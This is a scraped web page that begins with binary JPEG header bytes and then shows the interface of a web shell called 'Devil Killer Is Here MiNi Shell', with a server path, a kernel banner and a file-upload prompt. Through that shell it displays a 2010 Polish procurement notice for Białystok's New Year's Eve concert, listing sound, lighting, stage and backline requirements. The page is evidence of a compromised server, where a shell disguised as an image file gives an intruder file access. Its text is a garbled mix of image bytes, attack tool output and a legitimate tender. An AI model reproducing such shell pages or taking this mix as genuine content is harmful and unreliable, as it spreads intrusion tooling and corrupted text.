JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101119/375304-N-2010.html

<p class="kh_header"><b>Białystok: BOK/P/2/2010/sylwester miejski</b><br>
<b>Numer ogłoszenia: 375304 - 2010; data zamieszczenia: 19.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Białostocki Ośrodek Kultury , ul. Legionowa 5, 15-281 Białystok, woj. podlaskie, tel. 085 7424823, faks 085 7447023.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bok.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ośrodek kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BOK/P/2/2010/sylwester miejski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. usługa nagłosnienia wraz z obsługa techniczna, 2. oswietlenie sceny wraz z obsługa techniczna, 3. usługa montazu i demontażu sceny wraz z obsługą, 4.multimedia i scenografia wraz z obsługą, 5 zapewnienie backline wraz z obsługa. Szczegółowy opis przedmiotu zamówienia zgodnie z podanymi niżej  załącznikami:
Zał. Nr. 1. do ogłoszenia

NAGŁOŚNIENIE

SYSTEM NAGŁOŚNIENIA WIDOWNI (FOH)
Wymagane jest zapewnienie równomiernego nagłośnienia na terenie Rynku Kościuszki w Białymstoku za pomocą wysokiej jakości systemu wyrównanego liniowo.
KOLUMNY GŁOŚNIKOWE
I. NAGŁOŚNIENIE PLENEROWE, 
1. Wymagany jest  trójdrożny system nagłośnieniowy oraz minimum trójdrożny, aktywny podział częstotliwości z możliwością korekcji fazowo  częstotliwościowej układu.
2. Dopuszczone są wyłącznie duże, najwyższej serii modele zestawów głośnikowych Line
Array dedykowane do dużych produkcji, (określane zwykle np. LARGE SCALE, tURING SERIES itp.).
3. Preferowane systemy dźwiękowe takie jak: L AcoUSTICS, V DOSC, DV DOSC, MEYER SOUND, JBL VERTEC, MARTIN AUDIO, NEXO GEO, D&B;
Nie będą akceptowane kolumny głośnikowe dedykowane dla małych produkcji koncertowych, klubów, z serii oznaczonych najczęściej jako: PORTABLE, MULTI PURPOSE, BUDGET, lub CLUB, COMPACT, SMALL FORMAT. Wykluczone są tzw. domowe  produkcje, bez względu na jakość komponentów znajdujących się w kolumnie głośnikowej, czy wzmacniaczu mocy.
4. Systemy średnio  wysokotonowe powinny być bezwzględnie podwieszone. Zawieszenia powinny posiadać niezbędny atest. Należy użyć wież do podwieszenia systemu.
5. System nagłośnieniowy powinien równomiernie pokrywać dźwiękiem cały obszar audytorium, spełniając następujące warunki:
powinien być  złożony z dwóch  gron,po minimum 12 kolumn głośnikowych na stronę Line Array, podwieszonych obok sceny, ukierunkowanych tak, aby zminimalizować ewentualne odbicia dźwięku od ścian budynków, oraz z odpowiedniej ilości kolumn głośnikowych niskotonowych SUB BASS;
Musi być to system jednego z uznanych producentów światowych (tylko wysokie  serie). Łącznie system musi się składać z  minimalnie 24 jednakowych kolumn mid hi, basy w ilości  16 sztuk zbudowane w oparciu o głośnik min. 18 (lub minimalnie 8 sztuk 2 x 18). Moc całego zestawu  liczona poprzez zsumowanie mocy wzmacniaczy głośnikowych przy obciążeniu 2 ohm powinna nie być mniejsza niż 60kw rms.
6. Sektor bezpośrednio przy scenie powinien być nagłośniony niezależnie sterowanym, wysokiej jakości systemem kolumn głośnikowych FRONT FILL . 
7. Sektory boczne (jeżeli nagłaśniany teren jest szeroki) powinny być nagłośnione oddzielnie sterowanym systemem OUTFILL o mocy adekwatnej do nagłośnianego obszaru.
8. Obiekty plenerowe o zaplanowanym audytorium dłuższym niż 80m wymagają zastosowania
systemu linii opóźniającej DELAY.
9. Konfiguracja aparatury dla potrzeb koncertu należy opracować w odpowiednim, dedykowanym dla danego systemu dźwiękowego programie symulacyjnym. 
10. Należy dołączyć symulację pokrycia terenu przez proponowany system nagłośnieniowy, minimalne ciśnienie akustyczne na całym terenie imprezy  to 110 db Spl (A ważone).
KONSOLETA MIKSERSKA FOH
1. Digidesign Profile lub Yamaha PM5D;
3. Konsoleta powinna być usytuowana w odległości 25, 30m, centralnie w osi sceny, na podeście nie wyższym niż 0,5 m.
PROCESOR GŁOŚNIKOWY
Dedykowany wyłącznie do danej aparatury cyfrowy procesor głośnikowy, bądź procesor uznanych firm (DOLBY LAKE, XTAAPHEX, BSS, KLARK TEKNIK, DBX).

WZMACNIACZE MOCY
Wyłącznie odpowiednio wysokiej klasy wzmacniacze mocy renomowanych firm, dedykowane dla danej aparatury wykorzystywanej podczas koncertu.
SYSTEM ROZDZIAŁU I DYSTRYBUCJI DŹWIĘKU
Niezbędny jest profesjonalny system rozdziału i dystrybucji dźwięku, gwarantujący wielokanałowe (min. 48 kanały), galwanicznie (transformatorowo) separowane dostarczenie wszystkich źródeł dźwięku dla konsolety frontowej oraz odsłuchowej. Preferowane są aktywne splittery. Urządzenia muszą zapewniać odbiór czystego, wolnego od przydźwięków, wszelkich zakłóceń i przesterowań wielokanałowego sygnału.

SYSTEM ODSŁUCHOWY (MON)
KONSOLETA MONITOROWA
1. Yamaha M7cl lub Yamaha  PM5D;
3. Usytuowanie konsolety odsłuchowej z  boku sceny (zgodnie ze stage planem).
KOLUMNY ODSŁUCHOWE
Dopuszczalne są wyłącznie wysokiej klasy modele kolumn odsłuchowych przeznaczonych do profesjonalnych zastosowań. Preferowane modele to:
SIDE FILLS:
Min. Aktywne Jbl PRX 535 lub 512, 4 sztuki lub podobne;
WEDGES: (6 sztuk)
L ACOUSTCS 11 5XT HiQ, MEYER SOUND MFJ 212, MARTIN AUDIO LE 1500, TURBOSOUND TFM 212, d&b MAX, d&b MAX12.
DRUMFILL: wyłącznie bas aktywny do wsparcia odsłuchu dousznego;
MONITORY DOUSZNE, 8 sztuk:  wyłącznie    Sennheiser IEW 300G2 ( 2000 series, 
 3000 series ) lub    Shure PSM600 , PSM700;

UWAGAI
1. Aparatura nagłośnieniowa łącznie z rozstawieniem mikrofonów (sprawdzone przeloty) zgodnie z dostarczonym w terminie późniejszym  (stage planem) powinna być uruchomiona i sprawdzona na około 2 godziny przed próbą.
2. System nagłośnieniowy musi być bezwzględnie wolny od brumów i przydźwięków.
3. Instalacja elektryczna musi być bezwzględnie sprawna, sprawdzona na okoliczność zaistnienia niebezpieczeństwa porażenia prądem elektrycznym, zaopatrzona w ważne atesty.
4. Wszystkie gniazdka sieciowe udostępnione na scenie powinny być zaopatrzone w bolec uziemiający.
W/w sprzęt powinien posiadać stosowne atesty i nie być starszy niż 2 lata;


Zał. Nr.2 do ogłoszenia

OŚWIETLENIE

KONSOLETA OŚWIETLENIOWA
Wyłącznie Grand MA Full Size.
W czasie koncertu wymagany jest kontakt realizatora z operatorem spota, operator spota płynnie komunikujący się po angielsku.
DYMY
1. Maszyny do wytwarzania dymów (typu HAZER) powinny być usytuowane tak aby mogły wytworzyć mgłę na scenie, nie przeszkadzając przy tym muzykom w graniu (nie mogą być skierowane bezpośrednio w muzyków lub instrumenty muzyczne).
2. Maszyny do dymów muszą mieć płynną regulację intensywności dymienia.
3. Płyny do wytwarzania dymów powinny być bezwonne i posiadać odpowiedni atest.
4. Preferowanymi urządzeniami do wytwarzania dymu są: MDG Atmosphere APS, JEM ZR 24/7, MARTIN Hazer;
SPOT
Spot (reflektor prowadzący) powinien być ustawiony centralnie do sceny, na podwyższeniu (podeście) tak aby mógł ponad publicznością, swobodnie świecić  na scenę. Niezbędny jest kontakt  pomiędzy realizatorem oświetlenia a operatorem spota.
MIIMALNY WYKAZ SPRZĘTU OŚWIETLENIOWEGO:
10 x Vari Lite 2500 wash (żarówka wyładowcza 700w);
8 x Vari Lite 2500 spot (żarówka wyładowcza 700w);;
3 x Martin Atomic3000;
8 x blinder;
12 x Thomas Par64 MFL;
1 x reflektor prowadzący;
3 x belka quadro aluminiowa z wyciągarkami do podwieszenia sprzętu oświetleniowego;

Zał. Nr. 3 do ogłoszenia

Scena z zadaszeniem

1). Scena o konstrukcji kopułowej oparta na grubej (0,45m) konstrukcji quadro;
a) wymiary dachu 15x14m, wymiar podestu min. 12 x10m (optymalnie 14x12m) . 
b) podest nie może być ustawiony niżej niż na wysokości 1,5m;
c) prześwit pomiędzy przodem podłogi sceny, a dolnym wymiarem kratownicy poziomej belki zadaszenia (nie łukowatej), powinien wynosić 6m ( absolutnie nie mniej niż 6m), 
2) Boczne okotarowanie oraz tylny horyzont muszą być szczelne (podwójna gęsta siatka lub lekki, gęsty materiał), szczególnie podczas niesprzyjającej i problematycznej pogody,  woda nie może się dostawać na scenę bokami oraz tyłem sceny. Musi być tak gęsta, aby  chronić ogrzane powietrze przed oziębianiem się.
3) Scena musi posiadać schody po obu jej stronach.
4) Z lewej lub z prawej strony sceny musi być usytuowane profesjonalne zadaszone i osłonięte z trzech stron miejsce realizacyjne monitorowe  o wysokości sceny i wymiarach minimalnych 4 x 3m. Nie mogą to być ogródkowe, przeciwsłoneczne namiociki.
5) Na froncie musi znajdować się profesjonalne zadaszone i osłonięte z trzech stron miejsce mikserów frontowych oświetlenia i nagłośnienia o min wymiarach 4x3 m o wysokości podłogi nie wyżej niż 0,5m, usytuowane w osi sceny w odległości około 25,30m  do uzgodnienia z realizatorami nagłośnienia i oświetlenia przed imprezą.
6) Scena musi mieć aktualne atesty bezpieczeństwa i nie być starsza niż 2 lata. 
7) 3 podesty na kółkach 2x2x0,6m, 2x2x0,2m, 2x2x,0,2m oraz podest dla trzech kamer (1x2 m)
8) Wygrodzenie terenu imprezy masowej za pomocą barierek ochronnych, łącznie ok. 400mb barierek, z czego 50m barierek typu ciężkiego (przód estrady i początek korytarza dla akustyków). Wygrodzenie zgodne z dołączonym w terminie późniejszym planem imprezy masowej: estrada z zapleczem, teren imprezy masowej z wejściami dla publiczności, korytarz techniczny o szerokości 1m  z estrady do namiotu akustyków;
9) Ogrzanie estrady podczas próby oraz podczas koncertu za pomocą 5 nagrzewnic spalinowych, każda o mocy min. 60kw (koszt paliwa po stronie zleceniobiorcy). Szacowana ilość potrzebnego  paliwa to ok. 1.200 litrów. Nagrzewnice muszą być wyposażone w odpowiednie elastyczne kanały, aby równomiernie rozprowadzić ogrzane powietrze po całej estradzie.
W/w sprzęt powinien posiadać stosowne atesty i nie być starszy niż 2 lata;

Zał. Nr. 4 do ogłoszenia

Multimedia oraz scenografia:
a) Dwa telebimy  led RGB lub SMD 12,5 m2 o pixelu virtualnym 8mm, jasność powyżej 6.000 ansi umieszczone bo bokach estrady.
b) Dwie konstrukcje aluminiowe kratownicowe kompatybilne z estradą do podwieszenia ekranów z odpowiednimi atestami;
c) Sterowanie za pomocą skalera profesjonalnego (np. TVOne);
d) Mikser video minimalnie Edirol V8;
e) 3 kamery;
f) Wysięgnik (kran kamerowy) o długości minimalnej 7mb;
g) Przygotowanie autorskich wizualizacji związanych z tematyką wydarzenia kulturalnego oraz miksowanie materiału dostarczonego przez zespół Kate Ryan;
W/w sprzęt powinien posiadać stosowne atesty i nie być starszy niż 2 lata.

Zał. Nr. 5 do ogłoszenia

BACKLINE RIDER

KEYBOARDY 1 (dla BABL)
PROSZĘ DOKŁADNIE O TE MODELE!
1 ROLAND FANTOM G8 OR 1 ROLAND FANTOM G7
1 ROLAND SH 201
1 ROLAND V SYNTH GT OR 1 ROLAND VP 770
2 ROLAND KS V7 V STAND
1 ROLAND KS STV7 SECOND TIER FOR V STAND
KEYBOARDY 2 (dla HERVE)
PROSZĘ DOKŁADNIE O TE MODELE!
1 ROLAND RD 700 GX STAGE PIANO
1 ROLAND FANTOM G6
1 ROLAND KS V7 V STAND
1 ROLAND KS STV7 SECOND TIER FOR V STAND
PERKUSJA
ROLAND TD20KX
FULL VDRUMS
SET + SPDS
SAMPLING PAD
ROLAND V DRUMS TD 20KX (BOX 1)   SILVER FINISH
ROLAND V DRUMS TD 20KX (BOX 2)   SILVER FINISH
ROLAND V DRUMS MDS 25 STAND
2X ROLAND PDS 10 STANDS OR 1 X PDS 15 FOR SPD S
1X ROLAND SPD S SAMPLING PAD + APC 33 CLAMP + 2 X ACI POWER ADAPTER
1X PROFESIONALNE KRZESEŁKO PERKUSYJNE (PODWÓJNIE WZMOCNIONE) TAMA HT 630C
(LUB EKWIWALENT PEARL)
1X PROFESJONALNY STOJAK NA WERBEL (PODWÓJNIE WZMOCNIONY) TAMA HS 700WN
(LUB PEARL)
1X PROFESJONALNY STOJAK HIHAT  TAMA HH 805
(LUB PEARL H2000, H1000,  820W)
1X PROFESJONALNY PODWÓJNY PEDAŁ BĘBNA BASOWEGO TAMA HP900SW
(OR PEARL P2002)
1X PROSTY STOJAK NA CYMBAŁY TAMA HC72WN
(MODEL PROFESJONALNY , PODWÓJNIE WZMOCNIONE NOGI)

DODATKOWO
1 szt. 2X2 M MATA/DYWAN POD PERKUSJĘ
PODEST NA KÓŁKACH 2X2 M / MIN. WYSOKOŚĆ 40CM
PERKUSJA BĘDZIE DOSTĘPNA MINIMUM NA PÓŁTOREJ GODZINY PRZED WYSTĘPEM I OD MOMENTU ROZSTAWIENIA  AŻ DO KOŃCA WYSTĘPU UŻYWANA WYŁĄCZNIE PRZEZ ZESPÓŁ 
BAS
GITARA (4 STRUNY) : LAKLAND BOB GLAUB LUB DUCK DUNN LUB 44 02
LUB FENDER USA PRECISION
LUB MUSICMAN STINGRAY.
WZMACNIACZE:
AGUILAR DB 750 LUB AGUILAR DB 751
Z GABLOTĄ AGUILAR DB 810  LUB 2 GABLOTAMI AGUILAR DB 410  212 
LUB GŁOWICĄ I GABLOTĄ AMPEG SVT 
SYNTEZATOR BASOWY:
1 ROLAND SH 201
LUB MOOG VOYAGER, LITTLE PHATTY
LUB NORD LEAD 2
SPRZĘT :
1 ROLAND KS V7 V STAND (STOJAK W KSZTAŁCIE LITERY V)
1 PROFESJONALNY STOJAK NA GITARĘ
1 PROFESJONALNY TUNER DO GITARY
3 PROFESJONALNE PRZEWODY DO INSTRUMENTÓW.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.37.00.00-5, 45.22.38.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wykaz co najmniej 5 zamówien ona imprezy masowe plenerowe o podobnym charakterze jak sylwester miejski zrealizowanych w okresie ostatnich 3 latw zakresie obsługi technicznej obejmującej usługę montażu sceny,usługę nagłośnienia i oświetlenia koncertów oraz usługę wizualizacji wydarzeniua.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. w przypadku polegania na wiedzy i doświadczeniu, potencjale technicznym lub osobach innych podmiotów, wykonawca zoboaiązany jest przedstawić pisemne zobowiazanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
2. symulacja pokrycia terenu przez proponowany system nagłośnieniowy.
3. wykaz zrealizowanych zamówien</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
